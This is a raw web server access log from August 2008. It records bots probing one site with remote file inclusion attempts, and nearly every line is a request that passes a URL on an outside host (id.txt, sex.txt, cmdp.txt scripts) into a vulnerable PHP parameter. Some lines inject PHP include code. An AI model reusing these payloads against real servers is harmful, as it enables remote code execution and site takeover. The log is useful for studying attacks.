69.42.218.66 - - [10/Aug/2008:10:17:41 -0700] "GET /errors.php?error=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:10:17:43 -0700] "GET /logs/access_080110.log//htmltonuke.php?http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:10:17:43 -0700] "GET //htmltonuke.php?http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:10:17:44 -0700] "GET /logs//htmltonuke.php?http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.42.218.66 - - [10/Aug/2008:10:17:48 -0700] "GET /logs/access_080124.log/errors.php?error=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:18:17 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:18:19 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:18:29 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.172.129.75 - - [10/Aug/2008:10:18:33 -0700] "GET /index.php?dir=http://www.freexhost.info/users/gardhenal/Id.txt??? HTTP/1.1" 200 18431 "-" "libwww-perl/5.65" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:18:35 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:18:57 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:18:57 -0700] "GET /logs/access_080321.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:18:57 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:18:57 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:18:58 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:18:59 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:19:05 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:19:10 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:19:13 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:19:43 -0700] "GET /logs/access_080131.log/scanhttp://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:19:43 -0700] "GET /scanhttp://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:19:49 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:19:50 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:19:51 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
204.15.10.22 - - [10/Aug/2008:10:19:56 -0700] "GET //include/functions_common.php?gl_root_path=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
204.15.10.22 - - [10/Aug/2008:10:19:56 -0700] "GET /logs//include/functions_common.php?gl_root_path=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
66.7.198.72 - - [10/Aug/2008:10:19:57 -0700] "GET //include/functions_common.php?gl_root_path=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
66.7.198.72 - - [10/Aug/2008:10:19:57 -0700] "GET /logs//include/functions_common.php?gl_root_path=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:20:32 -0700] "GET /logs/scanhttp://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:20:32 -0700] "GET /logs/scanhttp://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:20:32 -0700] "GET /scanhttp://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:20:32 -0700] "GET /scanhttp://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:20:38 -0700] "GET /logs/access_080321.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.169.0.50 - - [10/Aug/2008:10:20:39 -0700] "GET //include/functions_common.php?gl_root_path=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
62.169.0.50 - - [10/Aug/2008:10:20:39 -0700] "GET /logs//include/functions_common.php?gl_root_path=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
82.194.76.177 - - [10/Aug/2008:10:20:39 -0700] "GET //include/functions_common.php?gl_root_path=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
82.194.76.177 - - [10/Aug/2008:10:20:39 -0700] "GET /logs//include/functions_common.php?gl_root_path=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
193.178.228.12 - - [10/Aug/2008:10:20:41 -0700] "GET /logs//include/functions_common.php?gl_root_path=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
193.178.228.12 - - [10/Aug/2008:10:20:41 -0700] "GET //include/functions_common.php?gl_root_path=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
69.65.41.92 - - [10/Aug/2008:10:20:47 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
69.65.41.92 - - [10/Aug/2008:10:20:47 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:20:54 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.148.169.202 - - [10/Aug/2008:10:20:59 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.gugn.ru/news/data/archives/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.148.169.202 - - [10/Aug/2008:10:20:59 -0700] "GET /logs/access_080117.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.gugn.ru/news/data/archives/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.148.169.202 - - [10/Aug/2008:10:20:59 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.gugn.ru/news/data/archives/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:21:37 -0700] "GET /scanhttp://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:22:01 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:22:03 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:22:09 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:22:18 -0700] "GET /logs/access_080329.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:22:18 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.42.218.66 - - [10/Aug/2008:10:22:23 -0700] "GET /logs//include/write.php?dir=http://www.geocities.com/metal_lord64/bat/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
69.42.218.66 - - [10/Aug/2008:10:22:23 -0700] "GET //include/write.php?dir=http://www.geocities.com/metal_lord64/bat/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:22:34 -0700] "GET /logs/access_080131.log/scanhttp://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:22:34 -0700] "GET /logs/access_080305.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:22:37 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:22:39 -0700] "GET /scanhttp://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:22:39 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.205.67.205 - - [10/Aug/2008:10:23:03 -0700] "GET /logs//index.php?view=page&pagename=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
67.205.67.205 - - [10/Aug/2008:10:23:03 -0700] "GET //index.php?view=page&pagename=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 200 5829 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:23:04 -0700] "GET /logs/access_080714.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.117.241.196 - - [10/Aug/2008:10:23:21 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:23:23 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:23:24 -0700] "GET /logs/access_080303.log//admin/business_inc/saveserver.php?thisdir=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:23:25 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.117.241.196 - - [10/Aug/2008:10:23:25 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:23:32 -0700] "GET /logs/access_080714.log//admin/business_inc/saveserver.php?thisdir=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.117.241.196 - - [10/Aug/2008:10:23:49 -0700] "GET /logs/access.log/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.70.145.159 - - [10/Aug/2008:10:23:50 -0700] "GET /logs/access_080110.log//htmltonuke.php?http://www.energobalt-spb.ru/error_log?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.70.145.159 - - [10/Aug/2008:10:23:50 -0700] "GET /logs//htmltonuke.php?http://www.energobalt-spb.ru/error_log?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.70.145.159 - - [10/Aug/2008:10:23:50 -0700] "GET //htmltonuke.php?http://www.energobalt-spb.ru/error_log?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
195.117.241.196 - - [10/Aug/2008:10:23:54 -0700] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.183.82 - - [10/Aug/2008:10:24:13 -0700] "GET /logs/access_080219.log/index.php?sayfa=http://rjoos.ch/Reise/images/tOtti/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:24:30 -0700] "GET /logs/access_080329.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:24:33 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:24:35 -0700] "GET /logs/access_080127.log/scanhttp://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:24:35 -0700] "GET /scanhttp://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:24:36 -0700] "GET /logs/scanhttp://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.117.241.196 - - [10/Aug/2008:10:24:52 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.117.241.196 - - [10/Aug/2008:10:24:55 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
201.70.145.159 - - [10/Aug/2008:10:24:56 -0700] "GET /logs/homepage.php?sel=http://www.energobalt-spb.ru/error_log?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
189.19.71.143 - - [10/Aug/2008:10:25:26 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:25:34 -0700] "GET /logs/access_080305.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:25:36 -0700] "GET /logs/access_080209.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:25:41 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:25:41 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:25:43 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:25:47 -0700] "GET /logs/access_080209.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:25:48 -0700] "GET /logs/access_080226.log//admin/classes/TplLoad.php?full_path_to_public_program=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:26:05 -0700] "GET /logs/access_080209.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:26:05 -0700] "GET /logs/access_080209.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:26:05 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:26:05 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.143.162 - - [10/Aug/2008:10:26:05 -0700] "GET /logs/access_080215.log//include/functions_common.php?gl_root_path=http://www.hydrocomp.com/phpmyfaq/attachments/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.143.162 - - [10/Aug/2008:10:26:05 -0700] "GET /logs//include/functions_common.php?gl_root_path=http://www.hydrocomp.com/phpmyfaq/attachments/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.143.162 - - [10/Aug/2008:10:26:05 -0700] "GET //include/functions_common.php?gl_root_path=http://www.hydrocomp.com/phpmyfaq/attachments/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:26:05 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:26:05 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.143.162 - - [10/Aug/2008:10:26:17 -0700] "GET /logs/access_080218.log//include/functions_common.php?gl_root_path=http://www.hydrocomp.com/phpmyfaq/attachments/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:26:20 -0700] "GET /logs/access_080221.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:26:21 -0700] "GET /logs/access_080221.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:26:34 -0700] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:26:35 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:26:35 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [10/Aug/2008:10:26:59 -0700] "GET /classes/core/language.php?rootdir=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
70.84.182.98 - - [10/Aug/2008:10:27:00 -0700] "GET /logs/classes/core/language.php?rootdir=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:27:13 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:27:13 -0700] "GET /logs/access_080218.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
202.228.192.194 - - [10/Aug/2008:10:27:14 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://d35m0.homeunix.net/R7.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:27:14 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
202.228.192.194 - - [10/Aug/2008:10:27:14 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://d35m0.homeunix.net/R7.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
